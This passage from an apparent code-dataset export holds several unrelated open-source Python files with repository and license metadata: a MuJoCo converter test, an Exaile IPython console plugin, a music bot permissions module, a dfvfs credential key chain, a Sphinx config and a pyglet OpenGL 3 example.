<light cutoff="100" diffuse="1 1 1" dir="-0 0 -1.3" directional="true" exponent="1" pos="0 0 1.3" specular=".1 .1 .1"/>
<geom conaffinity="1" condim="3" material="MatPlane" name="floor" pos="0 0 0" rgba="0.8 0.9 0.8 1" size="40 40 40" type="plane"/>
<body name="parent" pos="0 0 0.75">
<camera name="track" mode="trackcom" pos="0 -3 0.3" xyaxes="1 0 0 0 0 1"/>
<geom name="parent_geom" pos="0 0 0" size="0.25" type="sphere"/>
<joint armature="0" damping="0" limited="false" margin="0.01" name="root" pos="0 0 0" type="free"/>
<body name="child_1" pos="0 0 0">
<geom fromto="0.0 0.0 0.0 0.2 0.2 0.0" name="aux_1_geom" size="0.08" type="capsule"/>
<body name="child_2" pos="0.2 0.2 0">
<joint axis="0 0 1" name="child_2_joint" pos="0.0 0.0 0.0" range="-30 30" type="hinge"/>
<geom fromto="0.0 0.0 0.0 0.2 0.2 0.0" name="child_2_geom" size="0.08" type="capsule"/>
<body pos="0.2 0.2 0">
<joint axis="-1 1 0" name="anon_joint" pos="0.0 0.0 0.0" range="30 70" type="hinge"/>
<geom fromto="0.0 0.0 0.0 0.4 0.4 0.0" name="left_ankle_geom" size="0.08" type="capsule"/>
</body>
</body>
</body>
</body>
</worldbody>
<actuator>
<motor ctrllimited="true" ctrlrange="-1.0 1.0" joint="child_2_joint" gear="150"/>
<motor ctrllimited="true" ctrlrange="-1.0 1.0" joint="anon_joint" gear="150"/>
</actuator>
</mujoco>
"""
class MujocoTest(absltest.TestCase):
def test_build(self):
m = mujoco.MujocoConverter(_TEST_XML, add_collision_pairs=True)
# Sanity check.
config = m.config
self.assertTrue(config.bodies)
self.assertTrue(config.joints)
self.assertTrue(config.actuators)
self.assertTrue(config.collide_include)
if __name__ == '__main__':
absltest.main()
|
apache-2.0
| 4,757,807,615,098,514,000 | 39.942857 | 133 | 0.634334 | false |
exaile/exaile
|
plugins/ipconsole/__init__.py
|
1
|
8594
|
# This plugin is adapted from the Python Console plugin and the IPython
# cookbook at:
# http://ipython.scipy.org/moin/Cookbook/EmbeddingInGTK
# Copyright (C) 2009-2010 Brian Parma
# Updated 2012 Brian Parma
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import logging
import sys
import site
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import GLib
from xl.nls import gettext as _
from xl import event
from xl import settings as xl_settings
from xl import providers
from xlgui.widgets import menu
from xlgui import guiutil
from . import ipconsoleprefs
from . import ipython_view as ip
FONT = "Luxi Mono 10"
SETTINGS_STRING = 'plugin_ipconsole_option_set'
LOGGER = logging.getLogger(__name__)
class Quitter:
"""Simple class to handle exit, similar to Python 2.5's.
This Quitter is used to circumvent IPython's circumvention
of the builtin Quitter, since it prevents exaile form closing."""
def __init__(self, exit_function, name):
self.exit_function = exit_function
self.name = name
def __repr__(self):
return 'Type %s() to exit.' % self.name
def __call__(self):
self.exit_function() # Passed in exit function
site.setquit() # Restore default builtins
exit() # Call builtin
class IPView(ip.IPythonView):
'''Extend IPythonView to support closing with Ctrl+D'''
__text_color = None
__background_color = None
__font = None
__css_provider = None
__text_color_str = None
__background_color_str = None
__font_str = None
__iptheme = None
def __init__(self, namespace):
ip.IPythonView.__init__(self)
event.add_ui_callback(self.__on_option_set, SETTINGS_STRING)
self.set_wrap_mode(Gtk.WrapMode.CHAR)
self.updateNamespace(namespace) # expose exaile (passed in)
# prevent exit and quit - freezes window? does bad things
self.updateNamespace({'exit': None, 'quit': None})
style_context = self.get_style_context()
self.__css_provider = Gtk.CssProvider()
style_context.add_provider(
self.__css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
# Trigger setup through options
for option in ('text_color', 'background_color', 'font'):
self.__on_option_set(
None, xl_settings, 'plugin/ipconsole/{option}'.format(option=option)
)
def __on_option_set(self, _event, settings, option):
if option == 'plugin/ipconsole/font':
pango_font_str = settings.get_option(option, FONT)
self.__font_str = guiutil.css_from_pango_font_description(pango_font_str)
GLib.idle_add(self.__update_css)
if option == 'plugin/ipconsole/text_color':
rgba_str = settings.get_option(option, 'lavender')
rgba = Gdk.RGBA()
rgba.parse(rgba_str)
self.__text_color_str = "color: " + guiutil.css_from_rgba_without_alpha(
rgba
)
GLib.idle_add(self.__update_css)
if option == 'plugin/ipconsole/background_color':
rgba_str = settings.get_option(option, 'black')
rgba = Gdk.RGBA()
rgba.parse(rgba_str)
self.__background_color_str = (
"background-color: " + guiutil.css_from_rgba_without_alpha(rgba)
)
GLib.idle_add(self.__update_css)
def __update_css(self):
if (
self.__text_color_str is None
or self.__background_color_str is None
or self.__font_str is None
):
# early initialization state: not all properties have been initialized yet
return False
data_str = "text {%s; %s;} textview {%s;}" % (
self.__background_color_str,
self.__text_color_str,
self.__font_str,
)
self.__css_provider.load_from_data(data_str.encode('utf-8'))
return False
def onKeyPressExtend(self, key_event):
if ip.IPythonView.onKeyPressExtend(self, key_event):
return True
if key_event.string == '\x04': # ctrl+d
self.destroy()
class IPythonConsoleWindow(Gtk.Window):
"""
A Gtk Window with an embedded IPython Console.
"""
__ipv = None
def __init__(self, namespace):
Gtk.Window.__init__(self)
self.set_title(_("IPython Console - Exaile"))
self.set_size_request(750, 550)
self.set_resizable(True)
self.__ipv = IPView(namespace)
self.__ipv.connect('destroy', lambda *_widget: self.destroy())
self.__ipv.updateNamespace({'self': self}) # Expose self to IPython
# make it scrollable
scrolled_window = Gtk.ScrolledWindow()
scrolled_window.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled_window.add(self.__ipv)
scrolled_window.show_all()
self.add(scrolled_window)
event.add_ui_callback(self.on_option_set, SETTINGS_STRING)
def on_option_set(self, _event, settings, option):
if option == 'plugin/ipconsole/opacity':
if sys.platform.startswith("win32"):
# Setting opacity on Windows crashes with segfault,
# see https://bugzilla.gnome.org/show_bug.cgi?id=674449
# Ignore this option.
return
value = settings.get_option(option, 80.0)
value = value / 100
if value > 1:
value = 1
self.set_opacity(value)
class IPConsolePlugin:
"""
This class holds the IPConsole plugin itself
"""
__console_window = None
__exaile = None
def enable(self, exaile):
"""
Called when plugin is enabled, or when exaile is loaded with the plugin
on by default.
"""
self.__exaile = exaile
def on_gui_loaded(self):
"""
Called when Exaile finished loading its GUI
"""
# Trigger initial setup through options:
if xl_settings.get_option('plugin/ipconsole/autostart', False):
self.__show_console()
# add menuitem to tools menu
item = menu.simple_menu_item(
'ipconsole',
['plugin-sep'],
_('Show _IPython Console'),
callback=lambda *_args: self.__show_console(),
)
providers.register('menubar-tools-menu', item)
def teardown(self, _exaile):
"""
Called when Exaile is shutting down
"""
# if window is open, kill it
if self.__console_window is not None:
self.__console_window.destroy()
def disable(self, exaile):
"""
Called when the plugin is disabled
"""
for item in providers.get('menubar-tools-menu'):
if item.name == 'ipconsole':
providers.unregister('menubar-tools-menu', item)
break
self.teardown(exaile)
def __show_console(self):
"""
Display window when the menu item is clicked.
"""
if self.__console_window is None:
import xl
import xlgui
self.__console_window = IPythonConsoleWindow(
{'exaile': self.__exaile, 'xl': xl, 'xlgui': xlgui}
)
self.__console_window.connect('destroy', self.__console_destroyed)
self.__console_window.present()
self.__console_window.on_option_set(
None, xl_settings, 'plugin/ipconsole/opacity'
)
def __console_destroyed(self, *_args):
"""
Called when the window is closed.
"""
self.__console_window = None
def get_preferences_pane(self):
"""
Called by Exaile when ipconsole preferences pane should be shown
"""
return ipconsoleprefs
plugin_class = IPConsolePlugin
|
gpl-2.0
| 9,188,069,743,243,977,000 | 31.187266 | 86 | 0.603677 | false |
reddit-diabetes/musicbot-cloud
|
musicbot/permissions.py
|
1
|
6508
|
import shutil
import logging
import traceback
import configparser
import discord
log = logging.getLogger(__name__)
class PermissionsDefaults:
perms_file = 'config/permissions.ini'
CommandWhiteList = set()
CommandBlackList = set()
IgnoreNonVoice = set()
GrantToRoles = set()
UserList = set()
MaxSongs = 0
MaxSongLength = 0
MaxPlaylistLength = 0
AllowPlaylists = True
InstaSkip = False
class Permissions:
def __init__(self, config_file, grant_all=None):
self.config_file = config_file
self.config = configparser.ConfigParser(interpolation=None)
if not self.config.read(config_file, encoding='utf-8'):
log.info("Permissions file not found, copying example_permissions.ini")
try:
shutil.copy('config/example_permissions.ini', config_file)
self.config.read(config_file, encoding='utf-8')
except Exception as e:
traceback.print_exc()
raise RuntimeError("Unable to copy config/example_permissions.ini to {}: {}".format(config_file, e))
self.default_group = PermissionGroup('Default', self.config['Default'])
self.groups = set()
for section in self.config.sections():
self.groups.add(PermissionGroup(section, self.config[section]))
# Create a fake section to fallback onto the permissive default values to grant to the owner
# noinspection PyTypeChecker
owner_group = PermissionGroup("Owner (auto)", configparser.SectionProxy(self.config, None))
if hasattr(grant_all, '__iter__'):
owner_group.user_list = set(grant_all)
self.groups.add(owner_group)
async def async_validate(self, bot):
log.debug("Validating permissions...")
og = discord.utils.get(self.groups, name="Owner (auto)")
if 'auto' in og.user_list:
log.debug("Fixing automatic owner group")
og.user_list = {bot.config.owner_id}
def save(self):
with open(self.config_file, 'w') as f:
self.config.write(f)
def for_user(self, user):
"""
Returns the first PermissionGroup a user belongs to
:param user: A discord User or Member object
"""
for group in self.groups:
if user.id in group.user_list:
return group
# The only way I could search for roles is if I add a `server=None` param and pass that too
if type(user) == discord.User:
return self.default_group
# We loop again so that we don't return a role based group before we find an assigned one
for group in self.groups:
for role in user.roles:
if role.id in group.granted_to_roles:
return group
return self.default_group
def create_group(self, name, **kwargs):
self.config.read_dict({name:kwargs})
self.groups.add(PermissionGroup(name, self.config[name]))
# TODO: Test this
class PermissionGroup:
def __init__(self, name, section_data):
self.name = name
self.command_whitelist = section_data.get('CommandWhiteList', fallback=PermissionsDefaults.CommandWhiteList)
self.command_blacklist = section_data.get('CommandBlackList', fallback=PermissionsDefaults.CommandBlackList)
self.ignore_non_voice = section_data.get('IgnoreNonVoice', fallback=PermissionsDefaults.IgnoreNonVoice)
self.granted_to_roles = section_data.get('GrantToRoles', fallback=PermissionsDefaults.GrantToRoles)
self.user_list = section_data.get('UserList', fallback=PermissionsDefaults.UserList)
self.max_songs = section_data.get('MaxSongs', fallback=PermissionsDefaults.MaxSongs)
self.max_song_length = section_data.get('MaxSongLength', fallback=PermissionsDefaults.MaxSongLength)
self.max_playlist_length = section_data.get('MaxPlaylistLength', fallback=PermissionsDefaults.MaxPlaylistLength)
self.allow_playlists = section_data.get('AllowPlaylists', fallback=PermissionsDefaults.AllowPlaylists)
self.instaskip = section_data.get('InstaSkip', fallback=PermissionsDefaults.InstaSkip)
self.validate()
def validate(self):
if self.command_whitelist:
self.command_whitelist = set(self.command_whitelist.lower().split())
if self.command_blacklist:
self.command_blacklist = set(self.command_blacklist.lower().split())
if self.ignore_non_voice:
self.ignore_non_voice = set(self.ignore_non_voice.lower().split())
if self.granted_to_roles:
self.granted_to_roles = set(self.granted_to_roles.split())
if self.user_list:
self.user_list = set(self.user_list.split())
try:
self.max_songs = max(0, int(self.max_songs))
except:
self.max_songs = PermissionsDefaults.MaxSongs
try:
self.max_song_length = max(0, int(self.max_song_length))
except:
self.max_song_length = PermissionsDefaults.MaxSongLength
try:
self.max_playlist_length = max(0, int(self.max_playlist_length))
except:
self.max_playlist_length = PermissionsDefaults.MaxPlaylistLength
self.allow_playlists = configparser.RawConfigParser.BOOLEAN_STATES.get(
self.allow_playlists, PermissionsDefaults.AllowPlaylists
)
self.instaskip = configparser.RawConfigParser.BOOLEAN_STATES.get(
self.instaskip, PermissionsDefaults.InstaSkip
)
@staticmethod
def _process_list(seq, *, split=' ', lower=True, strip=', ', coerce=str, rcoerce=list):
lower = str.lower if lower else None
_strip = (lambda x: x.strip(strip)) if strip else None
coerce = coerce if callable(coerce) else None
rcoerce = rcoerce if callable(rcoerce) else None
for ch in strip:
seq = seq.replace(ch, split)
values = [i for i in seq.split(split) if i]
for fn in (_strip, lower, coerce):
if fn: values = map(fn, values)
return rcoerce(values)
def add_user(self, uid):
self.user_list.add(uid)
def remove_user(self, uid):
if uid in self.user_list:
self.user_list.remove(uid)
def __repr__(self):
return "<PermissionGroup: %s>" % self.name
def __str__(self):
return "<PermissionGroup: %s: %s>" % (self.name, self.__dict__)
|
mit
| 7,524,979,346,034,419,000 | 34.369565 | 120 | 0.638291 | false |
dc3-plaso/dfvfs
|
dfvfs/credentials/keychain.py
|
1
|
2743
|
# -*- coding: utf-8 -*-
"""The path specification key chain.
The key chain is used to manage credentials for path specifications.
E.g. BitLocker Drive Encryption (BDE) encrypted volumes can require a
credential (e.g. password) to access the unencrypted data (unlock).
"""
from dfvfs.credentials import manager
class KeyChain(object):
"""Class that implements the key chain."""
def __init__(self):
"""Initializes the key chain."""
super(KeyChain, self).__init__()
self._credentials_per_path_spec = {}
def Empty(self):
"""Empties the key chain."""
self._credentials_per_path_spec = {}
def ExtractCredentialsFromPathSpec(self, path_spec):
"""Extracts credentials from a path specification.
Args:
path_spec (PathSpec): path specification to extract credentials from.
"""
credentials = manager.CredentialsManager.GetCredentials(path_spec)
for identifier in credentials.CREDENTIALS:
value = getattr(path_spec, identifier, None)
if value is None:
continue
self.SetCredential(path_spec, identifier, value)
def GetCredential(self, path_spec, identifier):
"""Retrieves a specific credential from the key chain.
Args:
path_spec (PathSpec): path specification.
identifier (str): credential identifier.
Returns:
object: credential or None if the credential for the path specification
is not set.
"""
credentials = self._credentials_per_path_spec.get(path_spec.comparable, {})
return credentials.get(identifier, None)
def GetCredentials(self, path_spec):
"""Retrieves all credentials for the path specification.
Args:
path_spec (PathSpec): path specification.
Returns:
dict[str,object]: credentials for the path specification.
"""
return self._credentials_per_path_spec.get(path_spec.comparable, {})
def SetCredential(self, path_spec, identifier, data):
"""Sets a specific credential for the path specification.
Args:
path_spec (PathSpec): path specification.
identifier (str): credential identifier.
data (object): credential data.
Raises:
KeyError: if the credential is not supported by the path specification
type.
"""
supported_credentials = manager.CredentialsManager.GetCredentials(path_spec)
if identifier not in supported_credentials.CREDENTIALS:
raise KeyError((
u'Unsuppored credential: {0:s} for path specification type: '
u'{1:s}').format(identifier, path_spec.type_indicator))
credentials = self._credentials_per_path_spec.get(path_spec.comparable, {})
credentials[identifier] = data
self._credentials_per_path_spec[path_spec.comparable] = credentials
|
apache-2.0
| -8,760,681,104,130,690,000 | 31.654762 | 80 | 0.692308 | false |
tsroten/ticktock
|
docs/conf.py
|
1
|
6517
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Tick Tock documentation build configuration file, created by
# sphinx-quickstart on Mon Dec 23 21:32:46 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Tick Tock'
copyright = '2014, Thomas Roten'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'TickTockdoc'
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ticktock', 'Tick Tock Documentation',
['Thomas Roten'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'python': ('http://docs.python.org/3.3', None)}
|
mit
| 7,387,666,310,333,664,000 | 31.914141 | 79 | 0.716127 | false |
nicememory/pie
|
pyglet/examples/opengl_3.py
|
1
|
1655
|
#!/usr/bin/python
# $Id:$
'''In order to use the new features of OpenGL 3, you must explicitly create
an OpenGL 3 context. You can do this by supplying the `major_version` and
`minor_version` attributes for a GL Config.
This example creates an OpenGL 3 context, prints the version string to stdout,
and exits.
At time of writing, only the beta nvidia driver on Windows and Linux support
OpenGL 3, and requires an 8-series or higher.
On Windows, OpenGL 3 API must be explicitly enabled using the nvemulate tool
[1]. Additionally, at time of writing the latest driver did not yet support
forward compatible or debug contexts.
On Linux, the only driver that currently exposes the required GLX extensions
is 177.61.02 -- later drivers (177.67, 177.68, 177.7*, 177.8*, 180.06) seem to
be missing the extensions.
[1] http://developer.nvidia.com/object/nvemulate.html
'''
from __future__ import print_function
import pyglet
# Specify the OpenGL version explicitly to request 3.0 features, including
# GLSL 1.3.
#
# Some other attributes relevant to OpenGL 3:
# forward_compatible = True To request a context without deprecated
# functionality
# debug = True To request a debug context
config = pyglet.gl.Config(major_version=3, minor_version=0)
# Create a context matching the above configuration. Will fail if
# OpenGL 3 is not supported by the driver.
window = pyglet.window.Window(config=config, visible=False)
# Print the version of the context created.
print('OpenGL version:', window.context.get_info().get_version())
window.close()
|
apache-2.0
| 8,591,080,027,478,945,000 | 34.777778 | 78 | 0.712387 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.